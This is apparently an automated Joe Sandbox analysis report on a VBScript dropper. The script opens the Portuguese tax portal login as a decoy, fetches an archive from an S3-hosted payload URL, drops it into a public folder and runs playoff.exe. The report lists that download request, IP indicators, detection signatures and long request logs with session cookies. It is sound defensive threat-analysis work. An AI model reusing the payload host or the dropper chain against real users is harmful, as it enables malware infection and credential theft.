Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
GuiaAT256201.vbs

Overview

General Information

Sample name:GuiaAT256201.vbs
Analysis ID:1597922
MD5:f9456f939cf31d52b97caecf5cba4fe4
SHA1:abc4fefa321e5991563d42b402770d72ef0f01cf
SHA256:1862ca13445df8799db87dacf311067c7f529ca46c7fcf44516fd908e6312eb2
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
System process connects to network (likely due to code injection or exploit)
Sigma detected: Execution from Suspicious Folder
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Creates a process in suspended mode (likely to inject code)
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
HTML title does not match URL
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6800 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\GuiaAT256201.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • chrome.exe (PID: 3840 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.acesso.gov.pt/v2/loginForm?partID=PFAP MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 7196 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=2040,i,14633557413047616428,5381384248003885766,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • playoff.exe (PID: 8028 cmdline: "C:\users\public\xboxtv\playoff.exe" MD5: D09260D8B9A5B5E8FAB0E3FA7EBA1D58)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Execution from Suspicious Folder
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\users\public\xboxtv\playoff.exe" , CommandLine: "C:\users\public\xboxtv\playoff.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\xboxtv\playoff.exe, NewProcessName: C:\Users\Public\xboxtv\playoff.exe, OriginalFileName: C:\Users\Public\xboxtv\playoff.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\GuiaAT256201.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6800, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\users\public\xboxtv\playoff.exe" , ProcessId: 8028, ProcessName: playoff.exe
Sigma detected: Script Initiated Connection to Non-Local Network
Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 3.5.216.50, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6800, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49704
Sigma detected: WScript or CScript Dropper
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\GuiaAT256201.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\GuiaAT256201.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\GuiaAT256201.vbs", ProcessId: 6800, ProcessName: wscript.exe
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\wscript.exe, ProcessId: 6800, TargetFilename: C:\Users\Public\xboxtv.zip
Sigma detected: Script Initiated Connection
Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 3.5.216.50, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6800, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49704
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\GuiaAT256201.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\GuiaAT256201.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\GuiaAT256201.vbs", ProcessId: 6800, ProcessName: wscript.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results
Source: https://www.acesso.gov.pt/v2/loginForm?partID=PFAPHTTP Parser: Title: acesso.gov.pt does not match URL
Source: https://www.acesso.gov.pt/v2/loginForm?partID=PFAPHTTP Parser: <input type="password" .../> found
Source: https://www.acesso.gov.pt/v2/loginForm?partID=PFAPHTTP Parser: No <meta name="author".. found
Source: https://www.acesso.gov.pt/v2/loginForm?partID=PFAPHTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 3.5.216.50:443 -> 192.168.2.5:49704 version: TLS 1.2

Networking

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exeNetwork Connect: 3.5.216.50 443Jump to behavior
Source: Joe Sandbox ViewIP Address: 62.28.254.215 62.28.254.215
Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /xboxtv.mpeg HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: playoffchampions.s3.eu-north-1.amazonaws.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /v2/loginForm?partID=PFAP HTTP/1.1Host: www.acesso.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /autentica_static/css/styles.css?cb=5.2.14 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAPAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ADRUM_BTa=R:0|g:3456e7b1-061b-466c-9917-b4d449a90644|n:customer1_ce667124-ad2e-4cec-9605-d46ab36ccf73; SameSite=None; ADRUM_BT1=R:0|i:26383|e:9; autentica_JSessionID=0yGUWL-tDrpV-dRbYlT4_nilHZq1zq3H66cHGlOgKue8VTFTKq1v!-583688011!-300282855; AT_P=!JOTw1azzUazpv5uXNCYICHCNuUpMadNCTQ1TwzO2BnURPP8ufo7RG9hD0MgwxoP68Hy1JxEt9n0/sLo=; TS017b475d=01e43c52fec4824682e931aea7dbe99fc0da8ef7a5332311d3b9fc9457150550b8660f940edb60af9b9ebf9d6c66f888962fd17bc6; TSbfdc4c04027=08def0a5edab20002afdebab6ceade4bbf702402da574956e2d3d2603a9f6e2ef0736dc704abc62508639a79311130005df524463572ab5ee183f3a82a1f291d806bcd98f43f85350a9f2f65d995ac995ab16bb6adbac0f0bee883cfe775e1b6
Source: global trafficHTTP traffic detected: GET /autentica_static/css/tabs.css?cb=5.2.14 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAPAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ADRUM_BTa=R:0|g:3456e7b1-061b-466c-9917-b4d449a90644|n:customer1_ce667124-ad2e-4cec-9605-d46ab36ccf73; SameSite=None; ADRUM_BT1=R:0|i:26383|e:9; autentica_JSessionID=0yGUWL-tDrpV-dRbYlT4_nilHZq1zq3H66cHGlOgKue8VTFTKq1v!-583688011!-300282855; AT_P=!JOTw1azzUazpv5uXNCYICHCNuUpMadNCTQ1TwzO2BnURPP8ufo7RG9hD0MgwxoP68Hy1JxEt9n0/sLo=; TS017b475d=01e43c52fec4824682e931aea7dbe99fc0da8ef7a5332311d3b9fc9457150550b8660f940edb60af9b9ebf9d6c66f888962fd17bc6; TSbfdc4c04027=08def0a5edab20002afdebab6ceade4bbf702402da574956e2d3d2603a9f6e2ef0736dc704abc62508639a79311130005df524463572ab5ee183f3a82a1f291d806bcd98f43f85350a9f2f65d995ac995ab16bb6adbac0f0bee883cfe775e1b6
Source: global trafficHTTP traffic detected: GET /autentica_static/css/bootstrap.min.css?cb=5.2.14 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAPAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ADRUM_BTa=R:0|g:3456e7b1-061b-466c-9917-b4d449a90644|n:customer1_ce667124-ad2e-4cec-9605-d46ab36ccf73; SameSite=None; ADRUM_BT1=R:0|i:26383|e:9; autentica_JSessionID=0yGUWL-tDrpV-dRbYlT4_nilHZq1zq3H66cHGlOgKue8VTFTKq1v!-583688011!-300282855; AT_P=!JOTw1azzUazpv5uXNCYICHCNuUpMadNCTQ1TwzO2BnURPP8ufo7RG9hD0MgwxoP68Hy1JxEt9n0/sLo=; TS017b475d=01e43c52fec4824682e931aea7dbe99fc0da8ef7a5332311d3b9fc9457150550b8660f940edb60af9b9ebf9d6c66f888962fd17bc6; TSbfdc4c04027=08def0a5edab20002afdebab6ceade4bbf702402da574956e2d3d2603a9f6e2ef0736dc704abc62508639a79311130005df524463572ab5ee183f3a82a1f291d806bcd98f43f85350a9f2f65d995ac995ab16bb6adbac0f0bee883cfe775e1b6
Source: global trafficHTTP traffic detected: GET /autentica_static/css/sa-custom.css?cb=5.2.14 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAPAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ADRUM_BTa=R:0|g:3456e7b1-061b-466c-9917-b4d449a90644|n:customer1_ce667124-ad2e-4cec-9605-d46ab36ccf73; SameSite=None; ADRUM_BT1=R:0|i:26383|e:9; autentica_JSessionID=0yGUWL-tDrpV-dRbYlT4_nilHZq1zq3H66cHGlOgKue8VTFTKq1v!-583688011!-300282855; AT_P=!JOTw1azzUazpv5uXNCYICHCNuUpMadNCTQ1TwzO2BnURPP8ufo7RG9hD0MgwxoP68Hy1JxEt9n0/sLo=; TS017b475d=01e43c52fec4824682e931aea7dbe99fc0da8ef7a5332311d3b9fc9457150550b8660f940edb60af9b9ebf9d6c66f888962fd17bc6; TSbfdc4c04027=08def0a5edab20002afdebab6ceade4bbf702402da574956e2d3d2603a9f6e2ef0736dc704abc62508639a79311130005df524463572ab5ee183f3a82a1f291d806bcd98f43f85350a9f2f65d995ac995ab16bb6adbac0f0bee883cfe775e1b6
Source: global trafficHTTP traffic detected: GET /app/pfstatic_static/js/pf-footer.js HTTP/1.1Host: static.portaldasfinancas.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.acesso.gov.pt/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /autentica_static/pf/css/footer.css?cb=5.2.14 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAPAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ADRUM_BTa=R:0|g:3456e7b1-061b-466c-9917-b4d449a90644|n:customer1_ce667124-ad2e-4cec-9605-d46ab36ccf73; SameSite=None; ADRUM_BT1=R:0|i:26383|e:9; autentica_JSessionID=0yGUWL-tDrpV-dRbYlT4_nilHZq1zq3H66cHGlOgKue8VTFTKq1v!-583688011!-300282855; AT_P=!JOTw1azzUazpv5uXNCYICHCNuUpMadNCTQ1TwzO2BnURPP8ufo7RG9hD0MgwxoP68Hy1JxEt9n0/sLo=; TS017b475d=01e43c52fec4824682e931aea7dbe99fc0da8ef7a5332311d3b9fc9457150550b8660f940edb60af9b9ebf9d6c66f888962fd17bc6; TSbfdc4c04027=08def0a5edab20002afdebab6ceade4bbf702402da574956e2d3d2603a9f6e2ef0736dc704abc62508639a79311130005df524463572ab5ee183f3a82a1f291d806bcd98f43f85350a9f2f65d995ac995ab16bb6adbac0f0bee883cfe775e1b6
Source: global trafficHTTP traffic detected: GET /autentica_static/pf/css/pf-main.css?cb=5.2.14 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAPAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ADRUM_BTa=R:0|g:3456e7b1-061b-466c-9917-b4d449a90644|n:customer1_ce667124-ad2e-4cec-9605-d46ab36ccf73; SameSite=None; ADRUM_BT1=R:0|i:26383|e:9; autentica_JSessionID=0yGUWL-tDrpV-dRbYlT4_nilHZq1zq3H66cHGlOgKue8VTFTKq1v!-583688011!-300282855; AT_P=!JOTw1azzUazpv5uXNCYICHCNuUpMadNCTQ1TwzO2BnURPP8ufo7RG9hD0MgwxoP68Hy1JxEt9n0/sLo=; TS017b475d=01e43c52fec4824682e931aea7dbe99fc0da8ef7a5332311d3b9fc9457150550b8660f940edb60af9b9ebf9d6c66f888962fd17bc6; TSbfdc4c04027=08def0a5edab20002afdebab6ceade4bbf702402da574956e2d3d2603a9f6e2ef0736dc704abc62508639a79311130005df524463572ab5ee183f3a82a1f291d806bcd98f43f85350a9f2f65d995ac995ab16bb6adbac0f0bee883cfe775e1b6
Source: global trafficHTTP traffic detected: GET /autentica_static/js/modernizr.js?cb=5.2.14 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAPAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ADRUM_BTa=R:0|g:3456e7b1-061b-466c-9917-b4d449a90644|n:customer1_ce667124-ad2e-4cec-9605-d46ab36ccf73; SameSite=None; ADRUM_BT1=R:0|i:26383|e:9; autentica_JSessionID=0yGUWL-tDrpV-dRbYlT4_nilHZq1zq3H66cHGlOgKue8VTFTKq1v!-583688011!-300282855; AT_P=!JOTw1azzUazpv5uXNCYICHCNuUpMadNCTQ1TwzO2BnURPP8ufo7RG9hD0MgwxoP68Hy1JxEt9n0/sLo=; TS017b475d=01e43c52fec4824682e931aea7dbe99fc0da8ef7a5332311d3b9fc9457150550b8660f940edb60af9b9ebf9d6c66f888962fd17bc6; TSbfdc4c04027=08def0a5edab20002afdebab6ceade4bbf702402da574956e2d3d2603a9f6e2ef0736dc704abc62508639a79311130005df524463572ab5ee183f3a82a1f291d806bcd98f43f85350a9f2f65d995ac995ab16bb6adbac0f0bee883cfe775e1b6
Source: global trafficHTTP traffic detected: GET /autentica_static/js/footer/footer.js?cb=5.2.14 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAPAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ADRUM_BTa=R:0|g:3456e7b1-061b-466c-9917-b4d449a90644|n:customer1_ce667124-ad2e-4cec-9605-d46ab36ccf73; SameSite=None; ADRUM_BT1=R:0|i:26383|e:9; autentica_JSessionID=0yGUWL-tDrpV-dRbYlT4_nilHZq1zq3H66cHGlOgKue8VTFTKq1v!-583688011!-300282855; AT_P=!JOTw1azzUazpv5uXNCYICHCNuUpMadNCTQ1TwzO2BnURPP8ufo7RG9hD0MgwxoP68Hy1JxEt9n0/sLo=; TS017b475d=01e43c52fec4824682e931aea7dbe99fc0da8ef7a5332311d3b9fc9457150550b8660f940edb60af9b9ebf9d6c66f888962fd17bc6; TSbfdc4c04027=08def0a5edab20002afdebab6ceade4bbf702402da574956e2d3d2603a9f6e2ef0736dc704abc62508639a79311130005df524463572ab5ee183f3a82a1f291d806bcd98f43f85350a9f2f65d995ac995ab16bb6adbac0f0bee883cfe775e1b6
Source: global trafficHTTP traffic detected: GET /autentica_static/img/autenticacaogov.png HTTP/1.1Host: www.acesso.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAPAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ADRUM_BTa=R:0|g:3456e7b1-061b-466c-9917-b4d449a90644|n:customer1_ce667124-ad2e-4cec-9605-d46ab36ccf73; SameSite=None; ADRUM_BT1=R:0|i:26383|e:9; autentica_JSessionID=0yGUWL-tDrpV-dRbYlT4_nilHZq1zq3H66cHGlOgKue8VTFTKq1v!-583688011!-300282855; AT_P=!JOTw1azzUazpv5uXNCYICHCNuUpMadNCTQ1TwzO2BnURPP8ufo7RG9hD0MgwxoP68Hy1JxEt9n0/sLo=; TS017b475d=01e43c52fec4824682e931aea7dbe99fc0da8ef7a5332311d3b9fc9457150550b8660f940edb60af9b9ebf9d6c66f888962fd17bc6; TSbfdc4c04027=08def0a5edab20002afdebab6ceade4bbf702402da574956e2d3d2603a9f6e2ef0736dc704abc62508639a79311130005df524463572ab5ee183f3a82a1f291d806bcd98f43f85350a9f2f65d995ac995ab16bb6adbac0f0bee883cfe775e1b6
Source: global trafficHTTP traffic detected: GET /autentica_static/img/iconGovPt_20x20.png HTTP/1.1Host: www.acesso.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAPAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ADRUM_BTa=R:0|g:3456e7b1-061b-466c-9917-b4d449a90644|n:customer1_ce667124-ad2e-4cec-9605-d46ab36ccf73; SameSite=None; ADRUM_BT1=R:0|i:26383|e:9; autentica_JSessionID=0yGUWL-tDrpV-dRbYlT4_nilHZq1zq3H66cHGlOgKue8VTFTKq1v!-583688011!-300282855; AT_P=!JOTw1azzUazpv5uXNCYICHCNuUpMadNCTQ1TwzO2BnURPP8ufo7RG9hD0MgwxoP68Hy1JxEt9n0/sLo=; TS017b475d=01e43c52fec4824682e931aea7dbe99fc0da8ef7a5332311d3b9fc9457150550b8660f940edb60af9b9ebf9d6c66f888962fd17bc6; TSbfdc4c04027=08def0a5edab20002afdebab6ceade4bbf702402da574956e2d3d2603a9f6e2ef0736dc704abc62508639a79311130005df524463572ab5ee183f3a82a1f291d806bcd98f43f85350a9f2f65d995ac995ab16bb6adbac0f0bee883cfe775e1b6
Source: global trafficHTTP traffic detected: GET /app/pfstatic_static/js/pf-footer.js HTTP/1.1Host: static.portaldasfinancas.gov.ptConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /autentica_static/js/jquery/jquery-1.11.1.min.js?cb=5.2.14 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAPAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ADRUM_BTa=R:0|g:3456e7b1-061b-466c-9917-b4d449a90644|n:customer1_ce667124-ad2e-4cec-9605-d46ab36ccf73; SameSite=None; ADRUM_BT1=R:0|i:26383|e:9; autentica_JSessionID=0yGUWL-tDrpV-dRbYlT4_nilHZq1zq3H66cHGlOgKue8VTFTKq1v!-583688011!-300282855; AT_P=!JOTw1azzUazpv5uXNCYICHCNuUpMadNCTQ1TwzO2BnURPP8ufo7RG9hD0MgwxoP68Hy1JxEt9n0/sLo=; TS017b475d=01e43c52fec4824682e931aea7dbe99fc0da8ef7a5332311d3b9fc9457150550b8660f940edb60af9b9ebf9d6c66f888962fd17bc6; TSbfdc4c04027=08def0a5edab20002afdebab6ceade4bbf702402da574956e2d3d2603a9f6e2ef0736dc704abc62508639a79311130005df524463572ab5ee183f3a82a1f291d806bcd98f43f85350a9f2f65d995ac995ab16bb6adbac0f0bee883cfe775e1b6
Source: global trafficHTTP traffic detected: GET /autentica_static/img/background.png HTTP/1.1Host: www.acesso.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.acesso.gov.pt/autentica_static/css/styles.css?cb=5.2.14Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ADRUM_BTa=R:0|g:3456e7b1-061b-466c-9917-b4d449a90644|n:customer1_ce667124-ad2e-4cec-9605-d46ab36ccf73; SameSite=None; ADRUM_BT1=R:0|i:26383|e:9; autentica_JSessionID=0yGUWL-tDrpV-dRbYlT4_nilHZq1zq3H66cHGlOgKue8VTFTKq1v!-583688011!-300282855; AT_P=!JOTw1azzUazpv5uXNCYICHCNuUpMadNCTQ1TwzO2BnURPP8ufo7RG9hD0MgwxoP68Hy1JxEt9n0/sLo=; 